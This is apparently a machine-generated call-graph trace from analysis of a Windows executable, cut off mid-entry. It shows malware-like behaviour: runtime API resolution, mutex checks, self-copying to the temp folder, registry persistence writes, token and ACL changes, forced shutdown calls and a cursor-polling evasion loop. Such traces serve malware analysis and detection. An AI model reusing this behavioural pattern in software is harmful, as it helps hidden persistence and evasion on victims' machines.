29575->29576 29577 408d42 GetVersionExA 29576->29577 29578 408d65 GetModuleHandleA GetProcAddress 29577->29578 29579 408d58 GetVersionExA 29577->29579 29580 408d85 GetNativeSystemInfo 29578->29580 29581 408d8d GetSystemInfo 29578->29581 29579->29578 29582 408d97 GetModuleHandleA GetProcAddress 29580->29582 29581->29582 29583 408dab 29582->29583 29583->29492 29583->29544 29585 414c06 29584->29585 29586 40db17 29585->29586 29587 414c40 lstrcpyA 29585->29587 29588 40c0b1 GetComputerNameA lstrcpyA 29586->29588 29587->29585 30152 421920 29588->30152 29592 40c14a lstrcatA 29592->29499 29594 40d4e1 29593->29594 29595 40d4b5 29593->29595 29594->29504 29594->29505 29594->29506 29596 413dd8 8 API calls 29595->29596 29597 40d4c0 Sleep 29596->29597 30156 4222f5 72 API calls 29597->30156 29599 40d4d1 Sleep 30157 406145 24 API calls 29599->30157 30158 413663 29601->30158 29604 40c5b9 CloseHandle 29606 40c5c4 29604->29606 29605 40c59d CreateMutexA GetLastError 29605->29604 29605->29606 29606->29515 29606->29520 29606->29544 29609 40d61b 29607->29609 29608 40d7cb 29608->29520 29609->29608 30167 414510 lstrlenA 29609->30167 29615 40d724 29616 40d7c0 GetCurrentProcess SetPriorityClass 29615->29616 29617 40d733 GetCurrentProcess SetPriorityClass 29615->29617 29616->29608 29618 40d743 29617->29618 29620 40d750 Sleep 29618->29620 29621 40d761 29618->29621 30174 414787 16 API calls 29618->30174 29620->29618 29620->29621 30175 413cc5 lstrcmpA SetFileAttributesA DeleteFileA MoveFileA 29621->30175 29623 40d773 30176 413cc5 lstrcmpA SetFileAttributesA DeleteFileA MoveFileA 29623->30176 29625 40d78a ShellExecuteA 29625->29616 29627 40d7b6 lstrcpyA 29625->29627 29627->29616 29629 413410 lstrcpyA 29628->29629 29630 40a968 GetModuleHandleA 29629->29630 29631 40abe1 GetLastError 29630->29631 29632 40a984 29630->29632 29633 40abf6 29631->29633 29634 413410 lstrcpyA 29632->29634 29635 413410 lstrcpyA 29633->29635 29636 40a997 GetProcAddress 29634->29636 29637 40ac09 LoadLibraryA 29635->29637 29638 413410 lstrcpyA 29636->29638 29639 40af6d GetLastError 29637->29639 29640 40ac1d 29637->29640 29641 40a9b6 GetProcAddress 29638->29641 29644 40af78 29639->29644 29642 413410 lstrcpyA 29640->29642 29643 413410 lstrcpyA 29641->29643 29645 40ac30 GetProcAddress 29642->29645 29646 40a9d5 GetProcAddress 29643->29646 29649 413410 lstrcpyA 29644->29649 29647 413410 lstrcpyA 29645->29647 29648 413410 lstrcpyA 29646->29648 29650 40ac4f GetProcAddress 29647->29650 29651 40a9f4 GetProcAddress 29648->29651 29652 40af95 LoadLibraryA 29649->29652 29653 413410 lstrcpyA 29650->29653 29654 413410 lstrcpyA 29651->29654 29655 40b501 GetLastError 29652->29655 29656 40afa9 29652->29656 29658 40ac6e GetProcAddress 29653->29658 29659 40aa13 GetProcAddress 29654->29659 29657 40b50c 29655->29657 29660 413410 lstrcpyA 29656->29660 29664 413410 lstrcpyA 29657->29664 29661 413410 lstrcpyA 29658->29661 29662 413410 lstrcpyA 29659->29662 29663 40afbc GetProcAddress 29660->29663 29665 40ac8d GetProcAddress 29661->29665 29666 40aa32 GetProcAddress 29662->29666 29667 413410 lstrcpyA 29663->29667 29668 40b529 LoadLibraryA 29664->29668 29669 413410 lstrcpyA 29665->29669 29670 413410 lstrcpyA 29666->29670 29671 40afdb GetProcAddress 29667->29671 29672 40ba33 GetLastError 29668->29672 29673 40b53d 29668->29673 29674 40acac GetProcAddress 29669->29674 29675 40aa51 GetProcAddress 29670->29675 29676 413410 lstrcpyA 29671->29676 29677 40ba3e 29672->29677 29678 413410 lstrcpyA 29673->29678 29679 413410 lstrcpyA 29674->29679 29680 413410 lstrcpyA 29675->29680 29681 40affa GetProcAddress 29676->29681 29687 413410 lstrcpyA 29677->29687 29682 40b550 GetProcAddress 29678->29682 29683 40accb GetProcAddress 29679->29683 29684 40aa70 GetProcAddress 29680->29684 29685 413410 lstrcpyA 29681->29685 29688 413410 lstrcpyA 29682->29688 29689 413410 lstrcpyA 29683->29689 29690 413410 lstrcpyA 29684->29690 29686 40b019 GetProcAddress 29685->29686 29691 413410 lstrcpyA 29686->29691 29692 40ba5b LoadLibraryA 29687->29692 29693 40b56f GetProcAddress 29688->29693 29694 40acea GetProcAddress 29689->29694 29695 40aa8f GetProcAddress 29690->29695 29698 40b038 GetProcAddress 29691->29698 29699 40bc1a GetLastError 29692->29699 29700 40ba6f 29692->29700 29701 413410 lstrcpyA 29693->29701 29696 413410 lstrcpyA 29694->29696 29697 413410 lstrcpyA 29695->29697 29702 40ad09 GetProcAddress 29696->29702 29703 40aaae GetProcAddress 29697->29703 29704 413410 lstrcpyA 29698->29704 29706 40bc25 29699->29706 29705 413410 lstrcpyA 29700->29705 29707 40b58e GetProcAddress 29701->29707 29708 413410 lstrcpyA 29702->29708 29709 413410 lstrcpyA 29703->29709 29710 40b057 GetProcAddress 29704->29710 29711 40ba82 GetProcAddress 29705->29711 29717 413410 lstrcpyA 29706->29717 29712 413410 lstrcpyA 29707->29712 29713 40ad28 GetProcAddress 29708->29713 29714 40aacd GetProcAddress 29709->29714 29715 413410 lstrcpyA 29710->29715 29716 413410 lstrcpyA 29711->29716 29718 40b5ad GetProcAddress 29712->29718 29719 413410 lstrcpyA 29713->29719 29720 413410 lstrcpyA 29714->29720 29721 40b076 GetProcAddress 29715->29721 29722 40baa1 GetProcAddress 29716->29722 29723 40bc42 LoadLibraryA 29717->29723 29724 413410 lstrcpyA 29718->29724 29726 40ad47 GetProcAddress 29719->29726 29727 40aaec GetProcAddress 29720->29727 29728 413410 lstrcpyA 29721->29728 29729 413410 lstrcpyA 29722->29729 29730 40bc56 29723->29730 29731 40bd3a GetLastError 29723->29731 29725 40b5cc GetProcAddress 29724->29725 29733 413410 lstrcpyA 29725->29733 29735 40ad5b 29726->29735 29736 413410 lstrcpyA 29727->29736 29737 40b095 GetProcAddress 29728->29737 29738 40bac0 GetProcAddress 29729->29738 29732 413410 lstrcpyA 29730->29732 29734 40bd45 29731->29734 29739 40bc69 GetProcAddress 29732->29739 29740 40b5eb GetProcAddress 29733->29740 29748 413410 lstrcpyA 29734->29748 29744 413410 lstrcpyA 29735->29744 29741 40ab0b GetProcAddress 29736->29741 29742 413410 lstrcpyA 29737->29742 29743 413410 lstrcpyA 29738->29743 29746 413410 lstrcpyA 29739->29746 29747 413410 lstrcpyA 29740->29747 29749 413410 lstrcpyA 29741->29749 29750 40b0b4 GetProcAddress 29742->29750 29745 40badf GetProcAddress 29743->29745 29751 40adb4 GetProcAddress 29744->29751 29752 413410 lstrcpyA 29745->29752 29753 40bc88 GetProcAddress 29746->29753 29754 40b60a GetProcAddress 29747->29754 29755 40bd62 LoadLibraryA 29748->29755 29756 40ab2a GetProcAddress 29749->29756 29757 413410 lstrcpyA 29750->29757 29758 413410 lstrcpyA 29751->29758 29759 40bafe GetProcAddress 29752->29759 29760 413410 lstrcpyA 29753->29760 29761 413410 lstrcpyA 29754->29761 29762 40bd72 29755->29762 29763 40bdbe GetLastError 29755->29763 29764 413410 lstrcpyA 29756->29764 29765 40b0d3 GetProcAddress 29757->29765 29766 40add3 GetProcAddress 29758->29766 29767 413410 lstrcpyA 29759->29767 29768 40bca7 GetProcAddress 29760->29768 29769 40b629 GetProcAddress 29761->29769 29770 413410 lstrcpyA 29762->29770 29772 40bdc9 29763->29772 29771 40ab49 GetProcAddress 29764->29771 29810 40b0e7 29765->29810 29773 413410 lstrcpyA 29766->29773 29774 40bb1d GetProcAddress 29767->29774 29775 413410 lstrcpyA 29768->29775 29776 413410 lstrcpyA 29769->29776 29777 40bd85 GetProcAddress 29770->29777 29809 40ab5d 29771->29809 29778 413410 lstrcpyA 29772->29778 29779 40adf2 GetProcAddress 29773->29779 29780 413410 lstrcpyA 29774->29780 29781 40bcc6 GetProcAddress 29775->29781 29783 40b648 GetProcAddress 29776->29783 29784 413410 lstrcpyA 29777->29784 29785 40bde6 LoadLibraryA 29778->29785 29786 413410 lstrcpyA 29779->29786 29787 40bb3c GetProcAddress 29780->29787 29788 413410 lstrcpyA 29781->29788 29782 413410 lstrcpyA 29789 40b140 GetProcAddress 29782->29789 29791 413410 lstrcpyA 29783->29791 29792 40bda4 GetProcAddress 29784->29792 29793 40beb3 GetLastError 29785->29793 29794 40bdfa 29785->29794 29795 40ae11 GetProcAddress 29786->29795 29796 413410 lstrcpyA 29787->29796 29797 40bce5 GetProcAddress 29788->29797 29798 413410 lstrcpyA 29789->29798 29790 413410 lstrcpyA 29799 40abca GetProcAddress 29790->29799 29800 40b667 GetProcAddress 29791->29800 29792->29772 29808 40bdb8 29792->29808 29811 40bebe 29793->29811 29801 413410 lstrcpyA 29794->29801 29802 40ae25 29795->29802 29803 40bb5b GetProcAddress 29796->29803 29804 413410 lstrcpyA 29797->29804 29805 40b15f GetProcAddress 29798->29805 29799->29633 29806 40abda 29799->29806 29807 413410 lstrcpyA 29800->29807 29812 40be0d GetProcAddress 29801->29812 29821 413410 lstrcpyA 29802->29821 29813 413410 lstrcpyA 29803->29813 29814 40bd04 GetProcAddress 29804->29814 29815 413410 lstrcpyA 29805->29815 29806->29633 29816 40b686 GetProcAddress 29807->29816 29808->29772 29809->29790 29810->29782 29817 413410 lstrcpyA 29811->29817 29818 413410 lstrcpyA 29812->29818 29819 40bb7a GetProcAddress 29813->29819 29814->29734 29842 40bd18 29814->29842 29820 40b17e GetProcAddress 29815->29820 29822 413410 lstrcpyA 29816->29822 29823 40bedb LoadLibraryA 29817->29823 29824 40be2c GetProcAddress 29818->29824 29825 413410 lstrcpyA 29819->29825 29826 413410 lstrcpyA 29820->29826 29827 40ae56 GetProcAddress 29821->29827 29828 40b6a5 GetProcAddress 29822->29828 29829 40bf3a GetLastError 29823->29829 29830 40beee 29823->29830 29831 413410 lstrcpyA 29824->29831 29832 40bb99 GetProcAddress 29825->29832 29833 40b19d GetProcAddress 29826->29833 29834 413410 lstrcpyA 29827->29834 29835 413410 lstrcpyA 29828->29835 29840 40bf45 29829->29840 29838 413410 lstrcpyA 29830->29838 29839 40be4b GetProcAddress 29831->29839 29841 413410 lstrcpyA 29832->29841 29843 413410 lstrcpyA 29833->29843 29836 40ae75 GetProcAddress 29834->29836 29837 40b6c4 GetProcAddress 29835->29837 29845 413410 lstrcpyA 29836->29845 29846 413410 lstrcpyA 29837->29846 29847 40bf01 GetProcAddress 29838->29847 29848 413410 lstrcpyA 29839->29848 29855 413410 lstrcpyA 29840->29855 29849 40bbb8 GetProcAddress 29841->29849 29842->29734 29844 40b1bc GetProcAddress 29843->29844 29850 413410 lstrcpyA 29844->29850 29851 40ae94 GetProcAddress 29845->29851 29852 40b6e3 GetProcAddress 29846->29852 29853 413410 lstrcpyA 29847->29853 29854 40be6a GetProcAddress 29848->29854 29849->29706 29899 40bbcc 29849->29899 29857 40b1db GetProcAddress 29850->29857 29858 413410 lstrcpyA 29851->29858 29859 413410 lstrcpyA 29852->29859 29860 40bf22 GetProcAddress 29853->29860 29861 413410 lstrcpyA 29854->29861 29856 40bf62 LoadLibraryA 29855->29856 29862 40bfd2 29856->29862 29863 40bf6f 29856->29863 29864 413410 lstrcpyA 29857->29864 29865 40aeb3 GetProcAddress 29858->29865 29866 40b702 GetProcAddress 29859->29866 29860->29840 29867 40bf38 29860->29867 29868 40be89 GetProcAddress 29861->29868 29873 413410 lstrcpyA 29862->29873 29869 413410 lstrcpyA 29863->29869 29870 40b1fa GetProcAddress 29864->29870 29871 413410 lstrcpyA 29865->29871 29872 413410 lstrcpyA 29866->29872 29867->29840 29868->29811 29874 40be9d 29868->29874 29875 40bf82 GetProcAddress 29869->29875 29876 413410 lstrcpyA 29870->29876 29877 40aed2 GetProcAddress 29871->29877 29878 40b721 GetProcAddress 29872->29878 29879 40bfe5 LoadLibraryA 29873->29879 29874->29811 29880 413410 lstrcpyA 29875->29880 29881 40b219 GetProcAddress 29876->29881 29882 413410 lstrcpyA 29877->29882 29883 413410 lstrcpyA 29878->29883 29884 40c010 29879->29884 29885 40bff1 29879->29885 29886 40bfa3 GetProcAddress 29880->29886 29887 40b22d 29881->29887 29888 40aef1 GetProcAddress 29882->29888 29889 40b740 GetProcAddress 29883->29889 29969 40d7d0 GetModuleFileNameA GetTempPathA lstrcatA 29884->29969 29890 413410 lstrcpyA 29885->29890 29891 413410 lstrcpyA 29886->29891 29898 413410 lstrcpyA 29887->29898 29892 413410 lstrcpyA 29888->29892 29893 413410 lstrcpyA 29889->29893 29894 40c004 GetProcAddress 29890->29894 29895 40bfc4 GetProcAddress 29891->29895 29896 40af10 GetProcAddress 29892->29896 29897 40b75f GetProcAddress 29893->29897 29894->29884 29895->29862 29900 413410 lstrcpyA 29896->29900 29901 413410 lstrcpyA 29897->29901 29902 40b262 GetProcAddress 29898->29902 29899->29706 29903 40af2f GetProcAddress 29900->29903 29904 40b77e GetProcAddress 29901->29904 29905 413410 lstrcpyA 29902->29905 29903->29644 29906 40af43 29903->29906 29907 413410 lstrcpyA 29904->29907 29908 40b281 GetProcAddress 29905->29908 29906->29644 29910 40b79d GetProcAddress 29907->29910 29909 413410 lstrcpyA 29908->29909 29911 40b2a0 GetProcAddress 29909->29911 29912 413410 lstrcpyA 29910->29912 29914 413410 lstrcpyA 29911->29914 29913 40b7bc GetProcAddress 29912->29913 29915 413410 lstrcpyA 29913->29915 29916 40b2bf GetProcAddress 29914->29916 29917 40b7db GetProcAddress 29915->29917 29918 413410 lstrcpyA 29916->29918 29919 413410 lstrcpyA 29917->29919 29920 40b2de GetProcAddress 29918->29920 29921 40b7fa GetProcAddress 29919->29921 29922 413410 lstrcpyA 29920->29922 29923 413410 lstrcpyA 29921->29923 29924 40b2fd GetProcAddress 29922->29924 29925 40b819 GetProcAddress 29923->29925 29926 413410 lstrcpyA 29924->29926 29927 413410 lstrcpyA 29925->29927 29928 40b31c GetProcAddress 29926->29928 29929 40b838 GetProcAddress 29927->29929 29930 413410 lstrcpyA 29928->29930 29931 413410 lstrcpyA 29929->29931 29932 40b33b GetProcAddress 29930->29932 29933 40b857 GetProcAddress 29931->29933 29934 413410 lstrcpyA 29932->29934 29935 413410 lstrcpyA 29933->29935 29936 40b35a GetProcAddress 29934->29936 29937 40b876 GetProcAddress 29935->29937 29938 413410 lstrcpyA 29936->29938 29939 413410 lstrcpyA 29937->29939 29940 40b379 GetProcAddress 29938->29940 29942 40b895 GetProcAddress 29939->29942 29941 413410 lstrcpyA 29940->29941 29943 40b398 GetProcAddress 29941->29943 29944 413410 lstrcpyA 29942->29944 29946 413410 lstrcpyA 29943->29946 29945 40b8b4 GetProcAddress 29944->29945 29947 413410 lstrcpyA 29945->29947 29948 40b3b7 GetProcAddress 29946->29948 29949 40b8d3 GetProcAddress 29947->29949 29950 413410 lstrcpyA 29948->29950 29951 413410 lstrcpyA 29949->29951 29952 40b3d6 GetProcAddress 29950->29952 29953 40b8f2 GetProcAddress 29951->29953 29954 413410 lstrcpyA 29952->29954 29955 413410 lstrcpyA 29953->29955 29956 40b3f5 GetProcAddress 29954->29956 29957 40b911 GetProcAddress 29955->29957 29958 413410 lstrcpyA 29956->29958 29957->29677 29959 40b929 29957->29959 29960 40b414 GetProcAddress 29958->29960 29959->29677 29961 413410 lstrcpyA 29960->29961 29962 40b433 GetProcAddress 29961->29962 29963 413410 lstrcpyA 29962->29963 29964 40b452 GetProcAddress 29963->29964 29965 40b466 29964->29965 29966 413410 lstrcpyA 29965->29966 29967 40b4ef GetProcAddress 29966->29967 29967->29657 29968 40b4ff 29967->29968 29968->29657 29970 414bf8 lstrcpyA 29969->29970 29971 40d804 29970->29971 30178 40c018 lstrcpyA 29971->30178 29973 40d80a 30191 40c34f GetCurrentProcess OpenProcessToken 29973->30191 29977 40d819 30204 415c5f 29977->30204 29979 40d81e GetTickCount 29979->29530 29982 413e32 29981->29982 29983 413e09 GetProcAddress 29981->29983 29982->29530 29983->29982 29984 413e1b 29983->29984 30242 413d4d 7 API calls 29984->30242 29986 413e27 29986->29530 30243 413d4d 7 API calls 29987->30243 29989 413de4 ExitWindowsEx 29989->29530 29991 40d31b lstrcpyA lstrlenA 29990->29991 29992 4136ff lstrlenA 29991->29992 29993 40d344 29992->29993 29994 413663 2 API calls 29993->29994 29995 40d355 lstrcatA 29994->29995 30006 40d366 29995->30006 29996 414ef4 30 API calls 29996->30006 29997 40d412 lstrcpyA lstrlenA 29997->30006 29998 40d39e lstrcpyA lstrlenA 29998->30006 29999 40d373 30244 414787 16 API calls 29999->30244 30245 414787 16 API calls 29999->30245 30246 414787 16 API calls 29999->30246 30001 413663 2 API calls 30004 40d43f lstrcatA 30001->30004 30002 413663 2 API calls 30005 40d3cb lstrcatA 30002->30005 30003 40d379 Sleep 30003->30006 30004->30006 30005->30006 30006->29991 30006->29996 30006->29997 30006->29998 30006->29999 30006->30001 30006->30002 30009 40d498 30006->30009 30009->29536 30147 40c4ce GetComputerNameA 30009->30147 30010 40d45f Sleep 30010->30006 30011 40d3eb Sleep 30011->30006 30250 41040c 29 API calls 30012->30250 30014 410b6b 30015 410bbc 30014->30015 30017 410b89 30014->30017 30023 410b8e 30014->30023 30253 4100d0 GetTickCount 30015->30253 30251 4100d0 GetTickCount 30017->30251 30020 410c3b 2 API calls 30024 410bb2 30020->30024 30021 410bd8 30025 410a09 31 API calls 30021->30025 30022 410bdd 30022->29527 30023->30020 30252 40ffcb GetTickCount 30024->30252 30025->30022 30027 410bba LeaveCriticalSection 30027->30021 30027->30022 30029 40d16a 30028->30029 30038 40d1ca 30028->30038 30029->30038 30254 40d09a lstrlenA 30029->30254 30030 40d09a 23 API calls 30032 40d1d5 30030->30032 30039 40c7e0 GetTickCount 30032->30039 30034 40d195 lstrlenA 30035 40d1ac lstrcatA 30034->30035 30036 40d1be 30034->30036 30035->30036 30037 40d09a 23 API calls 30036->30037 30037->30038 30038->30030 30040 40c81e 30039->30040 30041 40cd87 lstrcpyA lstrlenA 30040->30041 30043 413410 lstrcpyA 30040->30043 30044 40cdb4 Sleep 30041->30044 30045 40c85a lstrcpyA 30043->30045 30046 413410 lstrcpyA 30044->30046 30047 413410 lstrcpyA 30045->30047 30048 40cdd9 RegCreateKeyExA 30046->30048 30049 40c88c RegCreateKeyExA lstrlenA RegSetValueExA RegCloseKey Sleep 30047->30049 30050 4136ff lstrlenA 30048->30050 30051 413410 lstrcpyA 30049->30051 30052 40cded 30050->30052 30053 40c8f1 RegCreateKeyExA 30051->30053 30055 413663 2 API calls 30052->30055 30054 4136ff lstrlenA 30053->30054 30056 40c905 30054->30056 30057 40ce04 30055->30057 30058 413663 2 API calls 30056->30058 30059 40c7b4 3 API calls 30057->30059 30060 40c91c 30058->30060 30061 40ce0c lstrlenA RegSetValueExA RegCloseKey Sleep 30059->30061 30279 40c7b4 30060->30279 30063 413410 lstrcpyA 30061->30063 30065 40ce61 RegCreateKeyExA 30063->30065 30064 40c928 lstrlenA RegSetValueExA RegCloseKey Sleep 30066 413410 lstrcpyA 30064->30066 30067 4136ff lstrlenA 30065->30067 30068 40c97d RegCreateKeyExA 30066->30068 30069 40ce75 30067->30069 30070 4136ff lstrlenA 30068->30070 30071 413663 2 API calls 30069->30071 30072 40c991 30070->30072 30073 40ce8c 30071->30073 30075 413663 2 API calls 30072->30075 30074 40c7b4 3 API calls 30073->30074 30076 40ce94 lstrcatA lstrlenA RegSetValueExA RegCloseKey Sleep 30074->30076 30077 40c9a8 30075->30077 30076->29538 30078 40c7b4 3 API calls 30077->30078 30079 40c9b4 6 API calls 30078->30079 30080 413410 lstrcpyA 30079->30080 30081 40ca1f RegCreateKeyExA 30080->30081 30082 4136ff lstrlenA 30081->30082 30083 40ca33 30082->30083 30084 413663 2 API calls 30083->30084 30085 40ca4a 30084->30085 30086 40c7b4 3 API calls 30085->30086 30087 40ca56 lstrlenA RegSetValueExA RegCloseKey Sleep 30086->30087 30088 413410 lstrcpyA 30087->30088 30089 40caab RegCreateKeyExA 30088->30089 30090 4136ff lstrlenA 30089->30090 30091 40cabf 30090->30091 30092 413663 2 API calls 30091->30092 30093 40cad6 30092->30093 30094 40c7b4 3 API calls 30093->30094 30095 40cae2 lstrlenA RegSetValueExA RegCloseKey Sleep 30094->30095 30096 413410 lstrcpyA 30095->30096 30097 40cb37 RegCreateKeyExA 30096->30097 30098 4136ff lstrlenA 30097->30098 30099 40cb4b 30098->30099 30100 413663 2 API calls 30099->30100 30101 40cb62 30100->30101 30102 40c7b4 3 API calls 30101->30102 30103 40cb6e 7 API calls 30102->30103 30104 413410 lstrcpyA 30103->30104 30105 40cbfa RegCreateKeyExA 30104->30105 30106 4136ff lstrlenA 30105->30106 30107 40cc0e 30106->30107 30108 413663 2 API calls 30107->30108 30109 40cc24 30108->30109 30110 40c7b4 3 API calls 30109->30110 30111 40cc2c lstrlenA RegSetValueExA RegCloseKey Sleep 30110->30111 30112 413410 lstrcpyA 30111->30112 30113 40cc81 RegCreateKeyExA 30112->30113 30114 4136ff lstrlenA 30113->30114 30115 40cc95 30114->30115 30116 413663 2 API calls 30115->30116 30117 40ccac 30116->30117 30118 40c7b4 3 API calls 30117->30118 30119 40ccb4 lstrcatA lstrlenA RegSetValueExA RegCloseKey Sleep 30118->30119 30120 413410 lstrcpyA 30119->30120 30121 40cd1b RegCreateKeyExA 30120->30121 30122 4136ff lstrlenA 30121->30122 30123 40cd2f 30122->30123 30124 413663 2 API calls 30123->30124 30125 40cd46 30124->30125 30126 40c7b4 3 API calls 30125->30126 30127 40cd4e lstrlenA RegSetValueExA RegCloseKey Sleep 30126->30127 30127->30041 30127->30044 30283 4106f5 29 API calls 30128->30283 30130 410a27 LeaveCriticalSection 30130->29541 30135 40c6fa 30131->30135 30132 413663 2 API calls 30133 40c705 lstrcatA 30132->30133 30284 413a97 GetFileAttributesA 30133->30284 30135->30132 30136 40c73c lstrcpyA lstrlenA 30135->30136 30139 40c7a1 lstrcpyA 30135->30139 30285 401e2a 30135->30285 30143 40c761 30136->30143 30138 413663 2 API calls 30140 40c76a lstrcatA 30138->30140 30141 40c79f 30139->30141 30296 413a97 GetFileAttributesA 30140->30296 30141->29544 30143->30138 30143->30139 30143->30141 30144 401e2a 17 API calls 30143->30144 30144->30143 30145->29495 30146->29502 30148 4135c8 2 API calls 30147->30148 30149 40c523 OpenMutexA 30148->30149 30150 40c540 CloseHandle 30149->30150 30151 40c53c 30149->30151 30150->30151 30151->29536 30153 40c125 GetVolumeInformationA 30152->30153 30154 429b3e 30153->30154 30155 429b51 30154->30155 30155->29592 30156->29599 30157->29595 30162 413410 30158->30162 30161 40c581 OpenMutexA 30161->29604 30161->29605 30163 413422 30162->30163 30164 413447 lstrlenA 30163->30164 30166 41a679 lstrcpyA 30163->30166 30164->30161 30166->30164 30168 40d67b 30167->30168 30169 4135c8 30168->30169 30170 413410 lstrcpyA 30169->30170 30171 4135ee lstrlenA 30170->30171 30172 40d692 9 API calls 30171->30172 30173 413a97 GetFileAttributesA 30172->30173 30173->29615 30174->29618 30177 405fd0 8 API calls 30174->30177 30175->29623 30176->29625 30213 4136ff lstrlenA 30178->30213 30181 413663 2 API calls 30182 40c04c 30181->30182 30215 413e36 GetCurrentProcess OpenProcessToken 30182->30215 30185 4136ff lstrlenA 30186 40c078 lstrlenA 30185->30186 30187 413663 2 API calls 30186->30187 30188 40c08e 30187->30188 30189 413e36 25 API calls 30188->30189 30190 40c094 SetFileAttributesA lstrcatA 30189->30190 30190->29973 30192 40c392 GetTokenInformation CloseHandle 30191->30192 30194 40c38b 30191->30194 30193 40c3c1 AllocateAndInitializeSid 30192->30193 30192->30194 30193->30194 30198 40c3e2 30193->30198 30199 415ead 30194->30199 30195 40c41e FreeSid 30195->30194 30196 40c3fb EqualSid 30196->30198 30197 40c41d 30197->30195 30198->30195 30198->30196 30198->30197 30200 413410 lstrcpyA 30199->30200 30201 415ee0 RegCreateKeyExA 30200->30201 30202 413410 lstrcpyA 30201->30202 30203 415f0b RegSetValueExA RegCloseKey 30202->30203 30203->29977 30205 413410 lstrcpyA 30204->30205 30206 415c9a RegOpenKeyExA 30205->30206 30207 415cb1 30206->30207 30208 415cad 30206->30208 30209 413410 lstrcpyA 30207->30209 30208->29979 30210 415cd2 RegQueryValueExA 30209->30210 30211 415ce6 RegCloseKey 30210->30211 30212 415cee RegCloseKey 30210->30212 30211->30208 30212->29979 30214 40c034 lstrlenA 30213->30214 30214->30181 30216 413e67 GetTokenInformation GetLastError 30215->30216 30217 413e5c GetLastError 30215->30217 30219 413e91 30216->30219 30220 413e88 GetLastError 30216->30220 30218 40c052 SetFileAttributesA lstrcatA lstrcpyA 30217->30218 30218->30185 30235 410bf4 GetProcessHeap 30219->30235 30221 413f74 CloseHandle SetFileAttributesA 30220->30221 30221->30218 30223 413e9a GetTokenInformation 30224 413f55 GetLastError 30223->30224 30225 413eb7 GetLengthSid 30223->30225 30227 413f63 30224->30227 30228 413f5d 30224->30228 30226 410bf4 4 API calls 30225->30226 30229 413ecb InitializeAcl 30226->30229 30227->30221 30231 410c3b 2 API calls 30227->30231 30239 410c3b 30228->30239 30229->30224 30232 413edf AddAccessAllowedAce 30229->30232 30233 413f73 30231->30233 30232->30224 30234 413ef5 6 API calls 30232->30234 30233->30221 30234->30224 30236 410c1f RtlAllocateHeap 30235->30236 30237 410c28 30236->30237 30238 410c0f Sleep GetProcessHeap 30236->30238 30237->30223 30238->30236 30240 410c42 GetProcessHeap RtlFreeHeap 30239->30240 30241 410c55 30239->30241 30240->30241 30241->30227 30242->29986 30243->29989 30244->30003 30247 405fd0 8 API calls 30244->30247 30245->30011 30248 405fd0 8 API calls 30245->30248 30246->30010 30249 405fd0 8 API calls 30246->30249 30250->30014 30251->30023 30252->30027 30253->30027 30255 40d0bc lstrcpyA lstrlenA 30254->30255 30261 40d153 GetWindowsDirectoryA 30254->30261 30256 40d0f7 30255->30256 30257 413663 2 API calls 30256->30257 30258 40d114 lstrcatA SetFileAttributesA 30257->30258 30262 413bcf 30258->30262 30261->30034 30261->30038 30278 41382b CreateFileA GetFileSize CloseHandle 30262->30278 30264 413bde 30265 410bf4 4 API calls 30264->30265 30276 40d13d SetFileAttributesA 30264->30276 30266 413bfb CreateFileA 30265->30266 30267 413c2f CreateFileA 30266->30267 30277 413c94 30266->30277 30268 413c46 30267->30268 30267->30277 30273 413c65 ReadFile 30268->30273 30268->30277 30269 413ca8 CloseHandle 30270 413cad 30269->30270 30271 413cb1 CloseHandle 30270->30271 30272 413cb4 30270->30272 30271->30272 30274 410c3b 2 API calls 30272->30274 30275 413c71 WriteFile 30273->30275 30273->30277 30274->30276 30275->30268 30275->30277 30276->30256 30276->30261 30277->30269 30277->30270 30278->30264 30280 40c7ba 30279->30280 30281 413663 2 API calls 30280->30281 30282 40c7ce lstrcatA 30281->30282 30282->30064 30283->30130 30284->30135 30297 41382b CreateFileA GetFileSize CloseHandle 30285->30297 30287 401e3f 30288 410bf4 4 API calls 30287->30288 30295 401e4a 30287->30295 30289 401e55 30288->30289 30290 401e5f CreateFileA 30289->30290 30291 401e86 ReadFile CloseHandle 30290->30291 30292 401ea4 30290->30292 30298 401647 30291->30298 30294 410c3b 2 API calls 30292->30294 30294->30295 30295->30135 30296->30143 30297->30287 30299 401661 30298->30299 30300 401665 30298->30300 30299->30292 30301 40167c 30300->30301 30303 410bf4 4 API calls 30300->30303 30304 40170b 30300->30304 30309 4017d8 30300->30309 30301->30292 30302 410c3b 2 API calls 30302->30301 30303->30304 30310 41a7a8 8 API calls 30304->30310 30306 40178b 30311 417549 8 API calls 30306->30311 30308 4017b4 lstrlenA 30308->30309 30309->30302 30310->30306 30311->30308 30313 40c43c GetCursorPos 30312->30313 30314 40c44b Sleep 30313->30314 30314->30313 30317 40d211 lstrcpyA lstrcatA lstrlenA 30316->30317 30318 40d26c lstrcpyA lstrcatA lstrlenA 30316->30318 30326 40d23c 30317->30326 30325 40d28e 30318->30325 30319 413663 2 API calls 30322 40d249 lstrcatA 30319->30322 30320 413663 2 API calls 30321 40d295 lstrcatA 30320->30321 30336 414d8e CreateFileA 30321->30336 30390 414d8e CreateFileA 30322->30390 30325->30320 30327 40d2b0 GetTickCount 30325->30327 30326->30318 30326->30319 30328 40d2c0 30327->30328 30330 40c7e0 71 API calls 30328->30330 30337 406151 30328->30337 30331 40d2ca GetTickCount 30330->30331 30332 40d2d0 30331->30332 30333 40d2df Sleep 30331->30333 30391 4069aa 51 API calls 30332->30391 30333->30328 30335 40d2d5 GetTickCount 30335->30333 30336->30325 30338 413410 lstrcpyA 30337->30338 30339 406187 RegCreateKeyExA 30338->30339 30340 413410 lstrcpyA 30339->30340 30341 4061b3 RegSetValueExA Sleep RegCloseKey Sleep 30340->30341 30342 413410 lstrcpyA 30341->30342 30343 4061f8 RegCreateKeyExA 30342->30343 30344 413410 lstrcpyA 30343->30344 30345 406228 RegSetValueExA Sleep Sleep 30344->30345 30346 413410 lstrcpyA 30345->30346 30347 40625a RegSetValueExA Sleep 30346->30347 30348 413410 lstrcpyA 30347->30348 30349 406285 RegSetValueExA Sleep 30348->30349 30350 413410 lstrcpyA 30349->30350 30351 4062b0 RegSetValueExA Sleep 30350->30351 30352 413410 lstrcpyA 30351->30352 30353 4062db RegSetValueExA Sleep 30352->30353 30354 413410 lstrcpyA 30353->30354 30355 406306 RegSetValueExA Sleep 30354->30355 30356 413410 lstrcpyA 30355->30356 30357 406331 RegSetValueExA Sleep 30356->30357 30358 413410 lstrcpyA 30357->30358 30359 40635c RegSetValueExA Sleep 30358->30359 30360 413410 lstrcpyA 30359->30360 30361 406387 RegSetValueExA Sleep 30360->30361 30362 413410 lstrcpyA 30361->30362 30363 